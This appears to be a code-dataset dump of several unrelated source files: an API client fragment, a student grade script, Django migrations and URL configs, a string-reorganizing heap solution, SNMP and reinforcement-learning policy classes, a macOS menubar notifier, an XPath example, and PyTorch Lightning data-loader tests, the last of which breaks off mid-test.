query_params = []
if 's' in params:
query_params.append(('_s', params['s'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Access Token', 'Basic Authentication'] # noqa: E501
return self.api_client.call_api(
'/executables/promotions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[PromotionExecutableInfo]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| [
"[email protected]"
] | |
aa1bdb2b6f2dfc31f467de5d05807bbd3a3ac8c9 | 6138b65079150723e41812b1345001866eeec323 | /project.py | af6b2f1844c6d1749de71c454f280291881eebc0 | [] | no_license | sirinsu/GlobalAIHubPythonHomework | 6b62c20c1503e3fc9665729f02747d1ea2da8939 | 78598b0ef6105bef1c404bcd57a3313cf85cd568 | refs/heads/master | 2023-02-06T14:36:15.270897 | 2020-12-26T19:45:17 | 2020-12-26T19:45:17 | 324,580,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,657 | py | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
"""Student Management System"""
def calculateFinalGrade(grades):#takes a dictionary including midterm, final and project grades then returns the final grade after some calculations.
midterm = int(grades.get('midterm'))
final = int(grades.get('final'))
project = int(grades.get('project'))
final_grade = (midterm * 30 / 100) + (final * 50 / 100) + (project * 20 / 100)
return final_grade
def determinePassingGrade(grade):
pass_grade = ""
if grade >= 90:
pass_grade = "AA"
elif grade <90 and grade >=70:
pass_grade = "BB"
elif grade < 70 and grade >= 50:
pass_grade = "CC"
elif grade <50 and grade >= 30:
pass_grade = "DD"
else:
pass_grade = "FF"
return pass_grade
def studentManagementSystem():
from random import randrange
attempts = 3
while attempts > 0:
name = input("Please enter your name..")
surname = input("Please enter your surname..")
if name == "" or surname == "":
print("Incorrect name or surname. Please enter both your name and surname correctly.")
attempts = attempts - 1
else:
break
if attempts == 0:
print("Please try again later.")
return
lessons = []
for i in range(1,6):
lesson = input("Please write the name of the course you want to take or write q to continiue.")
if lesson == 'q':
if len(lessons) < 3:
return('You failed in class')
else:
break
else:
lessons.append(lesson)
i = 1
print()
print("----- Lessons You Took -----")
for lesson in lessons:
print(f"Lesson {i} - {lesson}")
i = i + 1
while True:
try:
chosen_lesson = int(input(f"Please choose a lesson number to take exams.(1 - {len(lessons)})"))
if chosen_lesson < 1 or chosen_lesson > len(lessons):
print("Please choose a correct lesson number.")
else:
break
except:
print("Please choose a correct lesson number.")
lesson = lessons[chosen_lesson - 1]
#print(lesson)
midterm = randrange(101)
final = randrange(101)
project = randrange(101)
grades = {"midterm": midterm, 'final':final, 'project':project}
final_grade = calculateFinalGrade(grades)
note = determinePassingGrade(final_grade)
if note == "FF":
pass
else:
print(f"NOTE: {note}")
studentManagementSystem()
# In[ ]:
| [
"[email protected]"
] | |
f50186d3a30eb10b2fb458ea10a2d9f678be8509 | 72639248c287778e8395a16aedc1fcb8eddcff30 | /lancers/migrations/0002_auto_20201019_2106.py | 8c19a2d52a9bbacf2be01fdf6269dd949eff97be | [] | no_license | takashifuruya0/fmanage | b13d92a8df6a38f1148a73f5fe189bdea55efc54 | 6f7c3fcca1e12e280a4c603397eb5e9ba80ab9dc | refs/heads/master | 2023-03-10T15:32:45.597104 | 2023-01-17T14:29:35 | 2023-01-17T14:29:35 | 123,647,988 | 0 | 0 | null | 2023-02-16T01:30:56 | 2018-03-03T01:20:11 | Python | UTF-8 | Python | false | false | 1,712 | py | # Generated by Django 2.2.16 on 2020-10-19 12:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lancers', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='opportunity',
name='related_opportunity',
field=models.ManyToManyField(blank=True, related_name='_opportunity_related_opportunity_+', to='lancers.Opportunity', verbose_name='関連案件'),
),
migrations.AlterField(
model_name='opportunity',
name='date_proposal',
field=models.DateField(blank=True, null=True, verbose_name='提案日'),
),
migrations.AlterField(
model_name='opportunity',
name='date_proposed_delivery',
field=models.DateField(blank=True, null=True, verbose_name='提案納期'),
),
migrations.AlterField(
model_name='opportunity',
name='description_proposal',
field=models.TextField(blank=True, null=True, verbose_name='提案内容'),
),
migrations.AlterField(
model_name='opportunity',
name='num_proposal',
field=models.IntegerField(blank=True, null=True, verbose_name='提案件数'),
),
migrations.AlterField(
model_name='opportunity',
name='val',
field=models.IntegerField(verbose_name='報酬額(税込)'),
),
migrations.AlterField(
model_name='opportunity',
name='val_payment',
field=models.IntegerField(verbose_name='クライアント支払額(税込)'),
),
]
| [
"[email protected]"
] | |
afc6e981f257ec4d3f19dd62d8a23a64ddeaccfe | 1b9623eb1e19d4ce775fdee6dadfcb743f8aac10 | /deptx/mop/urls.py | 8f199cc9587fb4f576da54aab386f0b99bb4c9ba | [] | no_license | pombredanne/deptx | d4784a75245f0df9b776fbfeab2a68194d9889cc | a7bd33ca658ab17060d803b86e35ae84cbd9ff08 | refs/heads/master | 2021-01-22T08:38:41.330904 | 2013-11-13T13:59:53 | 2013-11-13T13:59:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,854 | py | from django.conf.urls import patterns, url
from mop import views
# URL routes for the "mop" app.  The bare root serves the login screen and
# every gameplay page lives under intranet/.
# NOTE(review): django.conf.urls.patterns() is the pre-Django-1.10 routing
# API, so this file presumably targets an old Django release — confirm
# before upgrading.
urlpatterns = patterns('',
    url(r'^$', views.login, name='mop_login'),
    url(r'intranet/$', views.index, name='mop_index'),
    url(r'intranet/logout/', views.logout_view, name='mop_logout'),
    url(r'intranet/rules/', views.rules, name='mop_rules'),
    url(r'intranet/performance/', views.performance, name='mop_performance'),
    # Forms: blank templates, signed copies, and fill-in keyed by numeric id.
    url(r'intranet/forms/blank', views.forms_blank, name='mop_forms_blank'),
    url(r'intranet/forms/signed', views.forms_signed, name='mop_forms_signed'),
    url(r'intranet/forms/fill/(\d+)', views.form_fill, name='mop_forms_fill'),
    # Documents and their provenance records (serial is a slug-like token).
    url(r'intranet/documents/pool/', views.pool, name='mop_pool'),
    url(r'intranet/documents/$', views.documents, name='mop_documents'),
    url(r'intranet/document/([-\w]+)/provenance', views.provenance, name='mop_provenance'),
    # Internal mail client: folders, per-mail actions (by numeric id), compose.
    url(r'intranet/mail/inbox/', views.mail_inbox, name='mop_mail_inbox'),
    url(r'intranet/mail/outbox/', views.mail_outbox, name='mop_mail_outbox'),
    url(r'intranet/mail/trash/', views.mail_trash, name='mop_mail_trash'),
    url(r'intranet/mail/draft/', views.mail_draft, name='mop_mail_draft'),
    url(r'intranet/mail/view/(\d+)', views.mail_view, name='mop_mail_view'),
    url(r'intranet/mail/trashing/(\d+)', views.mail_trashing, name='mop_mail_trashing'),
    url(r'intranet/mail/untrashing/(\d+)', views.mail_untrashing, name='mop_mail_untrashing'),
    url(r'intranet/mail/deleting/(\d+)', views.mail_deleting, name='mop_mail_deleting'),
    url(r'intranet/mail/compose/$', views.mail_compose, name='mop_mail_compose'),
    url(r'intranet/mail/compose/(\d+)', views.mail_edit, name='mop_mail_edit'),
    url(r'intranet/mail/check/', views.mail_check, name='mop_mail_check'),
    url(r'intranet/control/$', views.control, name='mop_control'),
    )
| [
"[email protected]"
] | |
1fe2656260edd35919c9745fc47bafc67970c346 | c9c5463996bf9e2adcd4918857382121b0a5aa56 | /leetcode/堆/重构字符串.py | 0147b66b14e19194532f2ddae5788e111bc1a915 | [] | no_license | Da1anna/Data-Structed-and-Algorithm_python | fdf370c355248081990c57c1c8eb5e05c4781e2b | cce067ef4374128924018b00c5ea77d2e869a834 | refs/heads/master | 2022-12-27T13:24:36.084657 | 2020-10-13T02:39:39 | 2020-10-13T02:39:39 | 174,938,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,278 | py | '''
给定一个字符串S,检查是否能重新排布其中的字母,使得两相邻的字符不同。
若可行,输出任意可行的结果。若不可行,返回空字符串。
示例 1:
输入: S = "aab"
输出: "aba"
示例 2:
输入: S = "aaab"
输出: ""
注意:
S 只包含小写字母并且长度在[1, 500]区间内。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/reorganize-string
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
'''
'''
思路1:双指针交换法,遍历数组,当遇到一个字母与它之前一个不同时,从当前位置开始寻找一个可交换的字母,直到遍历完。
这个思路对 ‘baaba’就不行了,因为它无法将第一个b交换到后面
思路2:将每一类字母及其个数组合成一个元组,加入堆中,每次弹出两个不同的个数最多的字母,更新其个数,
重复直到弹完
'''
import heapq as hp
class Solution:
    # Greedy swap scan: walk the string and, whenever a character repeats its
    # predecessor, swap it with the next different character.  Known to fail
    # on inputs such as 'baaba' (it cannot move a leading letter backwards);
    # kept for reference.
    def reorganizeString_demo(self, S: str) -> str:
        chars = list(S)
        n = len(chars)
        for pos in range(1, n):
            if chars[pos] != chars[pos - 1]:
                continue
            probe = pos + 1
            while probe < n and chars[probe] == chars[pos]:
                probe += 1
            if probe >= n:
                return ''
            chars[pos], chars[probe] = chars[probe], chars[pos]
        return ''.join(chars)

    # Max-heap strategy: repeatedly emit the two currently most frequent
    # letters together, so no letter can ever sit next to itself.
    def reorganizeString(self, S: str) -> str:
        if len(S) == 1:
            return S
        # Min-heap over negated counts == max-heap over counts.
        heap = [(-S.count(ch), ch) for ch in set(S)]
        # Feasibility bound accounts for odd/even length: the most frequent
        # letter may occur at most (len + 1) // 2 times.
        limit = (len(S) + 1) // 2 + 1
        if any(-neg >= limit for neg, _ in heap):
            return ''
        hp.heapify(heap)
        pieces = []
        while len(heap) >= 2:
            neg1, ch1 = hp.heappop(heap)
            neg2, ch2 = hp.heappop(heap)
            pieces.append(ch1 + ch2)
            if neg1 + 1:
                hp.heappush(heap, (neg1 + 1, ch1))
            if neg2 + 1:
                hp.heappush(heap, (neg2 + 1, ch2))
        # At most one letter (with one occurrence) can be left over.
        if heap:
            pieces.append(heap[0][1])
        return ''.join(pieces)
# Smoke test: "aaab" cannot be rearranged, so this prints ''.
S = 'aaab'
res = Solution().reorganizeString(S)
print(res) | [
"[email protected]"
] | |
81c732330675c3664eaf16f1f79b56005c8f43b5 | ea8336d1d0ce8b70362a544a8cafd55189a47921 | /snmpagent_unity/unity_impl/StorageProcessorReadThroughput.py | d0944e72498dd8cef598fd5a9a8f7c6c92c30580 | [
"Apache-2.0"
] | permissive | emc-openstack/snmp-agent | d2697cc2b35bf614f8e7e6a09eaa7bdbba3f1d04 | 466cd3ac072cd3a67c85ae9a4d3c7da3ae7ec9fc | refs/heads/master | 2023-03-27T01:52:56.037323 | 2017-09-13T06:29:00 | 2017-09-13T06:29:00 | 124,860,756 | 2 | 1 | Apache-2.0 | 2019-10-04T23:00:47 | 2018-03-12T08:56:26 | Python | UTF-8 | Python | false | false | 301 | py | class StorageProcessorReadThroughput(object):
    def read_get(self, name, idx_name, unity_client):
        # Scalar SNMP GET handler: delegates to the Unity client for the
        # block-read IOPS of the storage processor identified by idx_name.
        return unity_client.get_sp_block_read_iops(idx_name)
class StorageProcessorReadThroughputColumn(object):
    # Table index column: enumerates the storage processors that the
    # read-throughput table iterates over.
    def get_idx(self, name, idx, unity_client):
        return unity_client.get_sps()
| [
"[email protected]"
] | |
661caf7b460c7daa1b1dcd64f2926900fa1374e5 | 2286b880df34e1bfabe79b3605de287040404560 | /02-02/todolist/task/urls.py | 97bdb244e32e547aaa634f5ef9fd3c9aa9311fa6 | [] | no_license | iklimah27/praxis-academy-2 | e5d8b08807980d6fd8ff6ab73caa6ea18083c7f8 | 925853b520c9a8d7a87d8980d7fedfa604d3b4c8 | refs/heads/master | 2022-12-25T01:54:45.572190 | 2020-10-15T07:22:06 | 2020-10-15T07:22:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
from django.contrib import admin
from django.urls import path
from django.shortcuts import render
from . import views
# Task routes: list (index), per-task detail, and delete, keyed by <id>.
urlpatterns = [
    path('', views.index),
    path('<id>/', views.detail),
    path('<id>/delete/', views.delete),
]
| [
"[email protected]"
] | |
f7c6dff56a5dbfbd57c51b742a1f32e141403c38 | da2583af7a14f04aed029a79a79224547de4c1f2 | /rl/policy/gp_linear_mean.py | ba4a963f759f350f923730c7a4ecbcfa39d55142 | [] | no_license | yun-long/rl_prototype | 4b0af8b817ad1c8bc30a46d7fa2e8f5cd37f7ea1 | 0a86a097d58ce299da90ea346e074f20fe167a5d | refs/heads/master | 2020-04-23T15:37:49.498870 | 2019-02-18T11:28:21 | 2019-02-18T11:28:21 | 171,271,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,545 | py | """
Gaussian policy, linear mean, constant variance
Reference: Jan Peters, A Survey on policy search for robotics
"""
import numpy as np
import time
from rl.policy.base import GaussianPolicy
class GPLinearMean(GaussianPolicy):
    """Gaussian policy with a feature-linear mean and constant covariance.

    The mean action for a state ``s`` is ``Mu_theta.T @ phi(s)`` where
    ``phi`` is the featurizer's transform; exploration noise is drawn from
    ``N(0, Sigma_action)``.  Reference: Jan Peters et al., "A Survey on
    Policy Search for Robotics".
    """

    def __init__(self, env, featurizer):
        # Environment and feature map used to build phi(state).
        self.env = env
        # Dimensions of the linear-Gaussian parameterization.
        self.num_features = featurizer.num_features
        self.num_actions = env.action_space.shape[0]
        self.featurizer = featurizer
        # Random initial mean weights, scaled by 1/sqrt(num_features) so the
        # initial mean actions stay O(1).
        self.Mu_theta = np.random.randn(self.num_features, self.num_actions) / np.sqrt(self.num_features)
        self.Sigma_action = np.eye(self.num_actions) * 1e1 # for exploration in parameter space
        super().__init__()

    def predict_action(self, state):
        """Sample an exploratory action for ``state``.

        Exploration happens in action space (step-based exploration): the
        action is drawn from ``N(Mu_theta.T @ phi(state), Sigma_action)``.

        :param state: observation accepted by ``self.featurizer.transform``
        :return: sampled action vector of shape ``(num_actions,)``
        :raises ValueError: if sampling fails (e.g. ``Sigma_action`` is not a
            valid covariance); the underlying error is chained as the cause.
        """
        featurized_state = self.featurizer.transform(state).T
        Mu_action = np.dot(self.Mu_theta.T, featurized_state).reshape(self.num_actions)
        try:
            action = np.random.multivariate_normal(Mu_action, self.Sigma_action)
        except Exception as exc:
            # Was a bare ``except: raise ValueError`` which swallowed the
            # original failure (and even KeyboardInterrupt).  Keep raising
            # ValueError for existing callers, but chain the real cause.
            raise ValueError("sampling from N(Mu_action, Sigma_action) failed") from exc
        return action

    def update_pg(self, alpha_coeff, theta_samples, advantanges):
        """Policy-gradient update (intentionally not implemented).

        NOTE: the parameter name ``advantanges`` (sic) is kept for backward
        compatibility with existing keyword callers.
        """
        pass

    def update_wml(self, Weights, Phi, A):
        """Weighted maximum-likelihood update of mean and covariance.

        :param Weights: per-sample weights, reshapeable to ``(T,)``
        :param Phi: state features, reshapeable to ``(T, num_features)``
        :param A: executed actions, reshapeable to ``(T, num_actions)``
        """
        T = Phi.shape[0]
        phi = Phi.reshape((T, self.num_features))
        Q = Weights.reshape(T)
        Q = np.diag(Q)
        A = A.reshape((T, self.num_actions))
        # Weighted least squares: Mu_theta = (Phi^T Q Phi)^-1 Phi^T Q A.
        theta_tmp1 = np.linalg.inv(np.dot(phi.T, np.dot(Q, phi)))
        theta_tmp2 = np.dot(phi.T, np.dot(Q, A))
        self.Mu_theta = np.dot(theta_tmp1, theta_tmp2).reshape(self.Mu_theta.shape)
        # Normalizer for the (bias-corrected) weighted covariance estimate.
        Z = (np.sum(Weights)**2 - np.sum(Weights**2)) / np.sum(Weights)
        nume_sum = 0
        for i in range(len(Weights)):
            # Residual of the executed action w.r.t. the refitted mean;
            # computed once per sample (the original evaluated the same
            # matrix product twice inside np.outer).
            resid = A[i] - np.dot(self.Mu_theta.T, phi[i, :])
            nume_sum += Weights[i] * np.outer(resid, resid)
        self.Sigma_action = nume_sum / Z

    def optimal_policy_demo(self, num_demos):
        """Roll out and render ``num_demos`` episodes with the current policy."""
        for i_demo in range(num_demos):
            print("Optimal Policy Demo : ", i_demo)
            state = self.env.reset()
            while True:
                action = self.predict_action(state)
                next_state, rewards, done, _ = self.env.step(action)
                state = next_state
                self.env.render()
                if done:
                    time.sleep(1)
                    break
            self.env.render(close=True)
| [
"[email protected]"
] | |
0e8e943f02932271670514383a5e7afae1d4e102 | 02be54b8a9ab6813274ae18feb428d0d1405b0b0 | /profiles/urls.py | 3664a3b5302ffe8a588e8eb15f400198f80a55f9 | [] | no_license | paulloy/msp4-brazen-mma | 8ee98e2f2b12a4a24b14d30c1456233b02457dcd | 33a430d6c81bb44525469bcee1beaee7c92b3f58 | refs/heads/master | 2023-03-27T13:29:12.825997 | 2021-03-31T03:30:46 | 2021-03-31T03:30:46 | 341,317,874 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from django.urls import path
from . import views
# Profile pages (delivery info, order history) plus a single-order lookup
# keyed by the order number.
urlpatterns = [
    path('profile_delivery_info/',
         views.profile_delivery_info, name='profile_delivery_info'),
    path('profile_order_history/',
         views.profile_order_history, name='profile_order_history'),
    path('order_history/<order_number>',
         views.order_history, name='order_history'),
]
| [
"[email protected]"
] | |
dd38fd11a56bf550fab0a93a602c8c020348595c | b58158b53e97775a63540a752b56783d80cf2ff7 | /menubarnotifier.py | 2a41f7e788e0eb8224065d97de104f5d5338e073 | [] | no_license | alexglasser/menubarnotifier | 334f6823a8c08f776ca9c1632c5ae09057fe2ec3 | 4f0b69a0ab9d5e4ca10dd6e0b0a5941a94fb8522 | refs/heads/master | 2021-01-19T20:14:51.074296 | 2014-09-24T02:14:40 | 2014-09-24T02:14:40 | 24,394,237 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,502 | py | #!/usr/bin/python
'''
menubarnotifier.py
Alex Glasser
September 23, 2014
Simple script to display a message in the Mac OS X menubar using PyObjC.
Make sure you have PyObjC installed - you can do this using MacPorts or Homebrew.
Call the script with the desired notification as argv[1]:
./menubarnotifier.py "Notification Text"
Suggested: Redirect stderr to /dev/null and run the script in the background:
./menubarnotifier.py "Notification Text" 2>/dev/null &
'''
from sys import argv
try:
    # PyObjC bridge; the star imports deliberately pull the whole Cocoa
    # namespace (NSObject, NSLog, NSStatusBar, ...) into scope.
    from PyObjCTools import AppHelper
    from Foundation import *
    from AppKit import *
except ImportError:
    print "Failed to import from PyObjC."
    exit(-1)
# Timer epoch: makes the status timer fire immediately on launch.
start_time = NSDate.date()
class MenubarNotifier(NSObject):
    # NSApplication delegate that owns the status-bar item and a repeating
    # heartbeat timer; clicking the item quits the app.
    state = 'ok'

    def applicationDidFinishLaunching_(self, sender):
        # Build the menubar item once the app is up and start the timer.
        NSLog("Loaded successfully.")
        # Get notification text from argv[1], if possible.
        try:
            display_text = " ".join(argv[1:])
        except IndexError:
            display_text = "Default Text"
        NSLog("Notification is '{}'".format(display_text))
        self.statusItem = NSStatusBar.systemStatusBar().statusItemWithLength_(NSVariableStatusItemLength)
        self.statusItem.setTitle_(display_text) # argv[1] or "Default Text"
        self.statusItem.setEnabled_(TRUE) # item is enabled for clicking
        self.statusItem.setAction_('statusItemClicked:') # method called when statusItem is clicked
        self.statusItem.setHighlightMode_(TRUE) # highlight the item when clicked
        # Get the timer going (fires every 5 s, repeating, on the run loop).
        self.timer = NSTimer.alloc().initWithFireDate_interval_target_selector_userInfo_repeats_(start_time, 5.0, self, 'tick:', None, True)
        NSRunLoop.currentRunLoop().addTimer_forMode_(self.timer, NSDefaultRunLoopMode)
        self.timer.fire()

    def tick_(self, notification):
        # Heartbeat callback selected by the 'tick:' selector above.
        NSLog("state is {}".format(self.state))

    def statusItemClicked_(self, notification):
        ''' Closes the application when clicked '''
        NSLog("Notification was clicked. Goodbye.")
        AppHelper.stopEventLoop()
def main():
    # Configure the shared NSApplication with our delegate and run the
    # Cocoa event loop (blocks until stopEventLoop is called).
    # Hide the dock icon
    info = NSBundle.mainBundle().infoDictionary()
    info["LSBackgroundOnly"] = "1"
    app = NSApplication.sharedApplication()
    delegate = MenubarNotifier.alloc().init()
    app.setDelegate_(delegate)
    AppHelper.runEventLoop()
if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        # Python 2 print statement: report the error and exit non-zero.
        print e
        exit(-1)
| [
"[email protected]"
] | |
9671494c7376ad81448f1c2d11f7707cd3a46a2a | a28f52ac4b77599ab9a71fea6f98d322974b5875 | /YAAS/migrations/0023_auctionstatus_version.py | 89357412d6d56ffe2d4301d0b50a4bc7cfcf2229 | [] | no_license | dawitnida/Pythonidae | 3785c3473f585ff5dc3865155547a7de845336b4 | 4df225bdc55ffee6d6bd02f32956a84fe27749a8 | refs/heads/master | 2022-12-12T12:21:24.278144 | 2022-05-12T19:52:44 | 2022-05-12T19:52:44 | 24,888,914 | 1 | 2 | null | 2022-05-12T19:52:45 | 2014-10-07T12:19:02 | Python | UTF-8 | Python | false | false | 520 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import concurrency.fields
class Migration(migrations.Migration):
    """Auto-generated migration: adds an optimistic-locking ``version``
    counter (django-concurrency IntegerVersionField) to AuctionStatus."""

    dependencies = [
        ('yaas', '0022_auto_20141101_2209'),
    ]

    operations = [
        migrations.AddField(
            model_name='auctionstatus',
            name='version',
            field=concurrency.fields.IntegerVersionField(default=1, help_text='record revision number'),
            preserve_default=True,
        ),
    ]
| [
"[email protected]"
] | |
58f225e91c9707ccec4037ee3789c38ff19785e9 | 799a0af9c05deabe5d5250a10e480ec15ae0216e | /Xpath_test/xpath_test_10.py | 3c4e2e550651ef49c998f95a34ee15717ae8ac84 | [
"MIT"
] | permissive | waws520waws/waws_spider | 9b2be28834c08166463fe265e0f5c37a874369c8 | c6a5988121f32619a5c5134c09fdfd556c696fe7 | refs/heads/master | 2021-03-20T06:01:22.041937 | 2020-03-28T02:49:16 | 2020-03-28T02:49:16 | 247,183,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | from lxml import etree
"""
contains的使用:应用于一个标签的属性有多个值的情况,如果我们还是用之前的相等的模式,是匹配不到值的
"""
# Sample fragment whose <li> carries two space-separated classes
# ("li li-first"); an exact @class="li" comparison would not match it.
text = '''
<li class="li li-first"><a href="link.html">first item</a></li>
'''
html = etree.HTML(text)
# contains() matches when "li" appears anywhere inside the class attribute.
result = html.xpath('//li[contains(@class, "li")]/a/text()')
print(result) | [
"[email protected]"
] | |
4bb2cddf7a70efd8f3dc3329932dd7882dbfab0e | 46a16d4d4054e6063d2f3ed07c79bbd34c520f3b | /tests/trainer/test_data_loading.py | e9d5d3cc047cb83b8c5f4675916634f6bfbab5e7 | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] | permissive | kaushikb11/pytorch-lightning | 123c90076d340214d8ba2f68b7a3138c2b30959d | 8a931732ae5135e3e55d9c7b7031d81837e5798a | refs/heads/master | 2023-08-25T09:07:02.245113 | 2021-08-22T18:50:10 | 2021-08-22T18:50:10 | 319,391,066 | 1 | 2 | Apache-2.0 | 2020-12-07T17:16:13 | 2020-12-07T17:16:12 | null | UTF-8 | Python | false | false | 11,953 | py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from re import escape
import pytest
from torch.utils.data import DataLoader, DistributedSampler
from torch.utils.data.sampler import BatchSampler, Sampler, SequentialSampler
from pytorch_lightning import Trainer
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _TORCH_GREATER_EQUAL_1_7
from tests.helpers import BoringModel, RandomDataset
@pytest.mark.skipif(
    sys.platform == "win32" and not _TORCH_GREATER_EQUAL_1_7, reason="Bad `torch.distributed` support on Windows"
)
@pytest.mark.parametrize("mode", (1, 2))
def test_replace_distributed_sampler(tmpdir, mode):
    """Custom DataLoader subclasses must survive re-instantiation with a
    DistributedSampler.  mode 1 uses a subclass whose extra ctor argument is
    never stored as an attribute, so re-instantiation fails with a helpful
    error; mode 2 stores it and the test run succeeds.
    """

    class IndexedRandomDataset(RandomDataset):
        def __getitem__(self, index):
            return self.data[index]

    class CustomDataLoader(DataLoader):
        # Stores the extra ctor argument, so it can be recovered on reinit.
        def __init__(self, num_features, dataset, *args, **kwargs):
            self.num_features = num_features
            super().__init__(dataset, *args, **kwargs)

    class FailureCustomDataLoader(DataLoader):
        # Drops the extra ctor argument: reinit cannot reconstruct it.
        def __init__(self, num_features, dataset, *args, **kwargs):
            super().__init__(dataset, *args, **kwargs)

    class CustomBatchSampler(BatchSampler):
        pass

    class TestModel(BoringModel):
        def __init__(self, numbers_test_dataloaders, mode):
            super().__init__()
            self._numbers_test_dataloaders = numbers_test_dataloaders
            self._mode = mode

        def test_step(self, batch, batch_idx, dataloader_idx=None):
            return super().test_step(batch, batch_idx)

        def on_test_start(self) -> None:
            # The rebuilt loader must keep the custom classes but carry a
            # DistributedSampler inside the custom batch sampler.
            dataloader = self.trainer.test_dataloaders[0]
            assert isinstance(dataloader, CustomDataLoader)
            assert dataloader.batch_size is None
            batch_sampler = dataloader.batch_sampler
            assert isinstance(batch_sampler, CustomBatchSampler)
            assert batch_sampler.batch_size == 1
            assert batch_sampler.drop_last
            assert isinstance(batch_sampler.sampler, DistributedSampler)

        def create_dataset(self):
            dataset = IndexedRandomDataset(32, 64)
            batch_sampler = None
            batch_size = 2
            if self._mode == 2:
                batch_size = 1
                batch_sampler = CustomBatchSampler(SequentialSampler(dataset), batch_size=batch_size, drop_last=True)
                dataloader_cls = CustomDataLoader
            else:
                dataloader_cls = FailureCustomDataLoader
            return dataloader_cls(32, dataset, batch_size=batch_size, batch_sampler=batch_sampler)

        def test_dataloader(self):
            return [self.create_dataset()] * self._numbers_test_dataloaders

    model = TestModel(2, mode)
    model.test_epoch_end = None
    trainer = Trainer(
        default_root_dir=tmpdir, limit_test_batches=2, plugins="ddp_find_unused_parameters_false", num_processes=1
    )
    if mode == 1:
        match = escape("missing attributes are ['num_features']")
        with pytest.raises(MisconfigurationException, match=match):
            trainer.test(model)
    else:
        trainer.test(model)
@pytest.mark.parametrize("num_workers", [0, 1])
def test_dataloader_warnings(num_workers):
    """ddp_spawn with few/ephemeral workers should emit a performance
    UserWarning whose wording depends on torch's persistent_workers support."""

    class TestModel(BoringModel):
        # Abort training immediately; we only care about the warning.
        def on_train_start(self, *_) -> None:
            raise SystemExit()

    dl = DataLoader(RandomDataset(32, 64), num_workers=num_workers)
    if hasattr(dl, "persistent_workers"):
        if num_workers == 0:
            warn_str = "Consider setting num_workers>0 and persistent_workers=True"
        else:
            warn_str = "Consider setting persistent_workers=True"
    else:
        warn_str = "Consider setting accelerator=ddp"

    trainer = Trainer(accelerator="ddp_spawn")
    with pytest.warns(UserWarning, match=warn_str), pytest.raises(SystemExit):
        trainer.fit(TestModel(), dl)
def test_replace_sampler_raises():
    """replace_sampler rejects objects that are not DataLoader subclasses."""
    trainer = Trainer()
    with pytest.raises(ValueError, match="needs to subclass `torch.utils.data.DataLoader"):
        trainer.replace_sampler(object(), object(), mode="fit")
def test_dataloaders_with_missing_keyword_arguments():
    """replace_sampler must re-instantiate DataLoader subclasses; subclasses
    that hide required ctor arguments (or drop them without storing an
    attribute) get a MisconfigurationException naming what is missing."""
    trainer = Trainer()
    ds = RandomDataset(10, 20)

    # Ctor accepts only `dataset`: sampler-related arguments cannot be passed.
    class TestDataLoader(DataLoader):
        def __init__(self, dataset):
            super().__init__(dataset)

    loader = TestDataLoader(ds)
    sampler = SequentialSampler(ds)
    match = escape("missing arguments are ['batch_sampler', 'sampler', 'shuffle']")
    with pytest.raises(MisconfigurationException, match=match):
        trainer.replace_sampler(loader, sampler, mode="fit")
    match = escape("missing arguments are ['batch_sampler', 'batch_size', 'drop_last', 'sampler', 'shuffle']")
    with pytest.raises(MisconfigurationException, match=match):
        trainer.replace_sampler(loader, sampler, mode="predict")

    # *args/**kwargs pass-through makes every argument forwardable: OK.
    class TestDataLoader(DataLoader):
        def __init__(self, dataset, *args, **kwargs):
            super().__init__(dataset)

    loader = TestDataLoader(ds)
    sampler = SequentialSampler(ds)
    trainer.replace_sampler(loader, sampler, mode="fit")
    trainer.replace_sampler(loader, sampler, mode="predict")

    class TestDataLoader(DataLoader):
        def __init__(self, *foo, **bar):
            super().__init__(*foo, **bar)

    loader = TestDataLoader(ds)
    sampler = SequentialSampler(ds)
    trainer.replace_sampler(loader, sampler, mode="fit")
    trainer.replace_sampler(loader, sampler, mode="predict")

    # Extra positional arg stored as an attribute, but sampler args missing.
    class TestDataLoader(DataLoader):
        def __init__(self, num_feat, dataset, *args, shuffle=False):
            self.num_feat = num_feat
            super().__init__(dataset)

    loader = TestDataLoader(1, ds)
    sampler = SequentialSampler(ds)
    match = escape("missing arguments are ['batch_sampler', 'sampler']")
    with pytest.raises(MisconfigurationException, match=match):
        trainer.replace_sampler(loader, sampler, mode="fit")
    match = escape("missing arguments are ['batch_sampler', 'batch_size', 'drop_last', 'sampler']")
    with pytest.raises(MisconfigurationException, match=match):
        trainer.replace_sampler(loader, sampler, mode="predict")

    # Extra arg stored under a *different* name: value cannot be recovered.
    class TestDataLoader(DataLoader):
        def __init__(self, num_feat, dataset, **kwargs):
            self.feat_num = num_feat
            super().__init__(dataset)

    loader = TestDataLoader(1, ds)
